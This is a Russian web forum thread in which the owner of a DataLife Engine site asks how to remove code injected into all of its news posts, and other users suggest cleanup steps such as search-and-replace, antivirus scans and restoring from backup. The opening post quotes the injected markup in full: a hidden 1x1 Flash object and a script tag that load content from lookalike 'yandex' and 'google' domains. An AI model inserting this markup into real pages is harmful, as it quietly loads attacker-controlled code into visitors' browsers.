• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Помощь Удаление вируса

red_devil_tlt

Постоялец
Регистрация
4 Фев 2008
Сообщения
91
Реакции
73
В общем яндекс прислал письмо что на сайте обнаружен вирус. Начал искать и нашел.

В каждой новости, в кратком и полном описаниях после текста добавлено следующее:

da8708449ea2227dc19840d1da0c8c9e.jpg



Код:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?ХХХХХХХХХХХХХХХХХХХХХХХ"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?ХХХХХХХХХХХХХХХХХХХХХХХ" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/ХХХХХХХХХХХХХХХХХХХХХХХ.js"></script>

где ХХХХХХХХХХХХХХХХХХХХХХХ - разный набор букв и цифр типа 6f3ef77ac0e3619e98159e9b6febf557 или 541668881

Естественно поменял все пароли как на аккаунт админа, так и на фтп и панель управления и проверил комп касперским. Логи отключены.

Так как новостей много, то вручную замучаешься удалять этот текст, потому что везде разный набор букв и цифр из каждой новости.


Подскажите как удалить этот текст?

Например, через запрос в MySQL или подскажите программку для замены текста где, к примеру, указать * (звездочку) вместо этого набора букв и цифр и полувчилось всё лишнее удалить


Версия DLE: 9.8 (nulled MID TEAM)
 
или подскажите программку для замены текста где, к примеру, указать * (звездочку) вместо этого набора букв и цифр и полувчилось всё лишнее удалить
попробуй html changer. Если количество символов одинаковое - можно и вордом
 
В ДЛЕ есть специальный пункт - Поиск и замена. Вводишь что заменить и на что заменить - во всех новостях вирус будет удалён. Опять же, если код везде одинаковый.

Так же не забываем воспользоваться антивирусом и найти в каком файле сидит пакость, отвечающая за добавление вируса в код новостей.
 
Сейчас еще обнаружил что содержимое некоторых новостей полностью заменено на такой же текст.
То есть даже если удалять то остануться пустые новости.

Попрошу хостера восстановить из бекапа всё. и потом буду смотреть
 
Чистите и сразу меры принимайте по защите, т.к. практика показывает, что если взломали 1 раз, то обязательно попробуют второй.
 
На компе Касперский обнаружил что-то?
 
У меня аналогичная проблема. Вирусов на сайте антивирус не находит. Увидел об этой проблеме, когда в яндекс вебмастере выскочило сообщение: Для просмотра ссылки Войди или Зарегистрируйся
Сайт давно заброшен поэтому и не уследил.
Я для начала сделал по другому. Сменил во всех новостях названия сайтов, прописанных в коде на пробел и подал Яндексу на перепроверку.
На всякий случай сменил пароли, но я сомневаюсь, что дело в них.
 
Несколько лет назад подхватил вирус на dle, но немного другой там внизу сайта приписывался java скрипт с ссылками, виной всему был фтп командр с вирусней.
 
Мое решение:
Сделайте резервную копию сайта и скачайте. В файлах сайта поищите слово "Для просмотра ссылки Войди или Зарегистрируйся" через Notepad ++.
С помощью этой программы думаю найдете. Скачать можно Для просмотра ссылки Войди или Зарегистрируйся.
 
Вот скрипт - кинуть в корень и запустить
И всё будет чисто ;)
 

Вложения

  • dle_clean.rar
    1,6 KB · Просмотры: 27
Назад
Сверху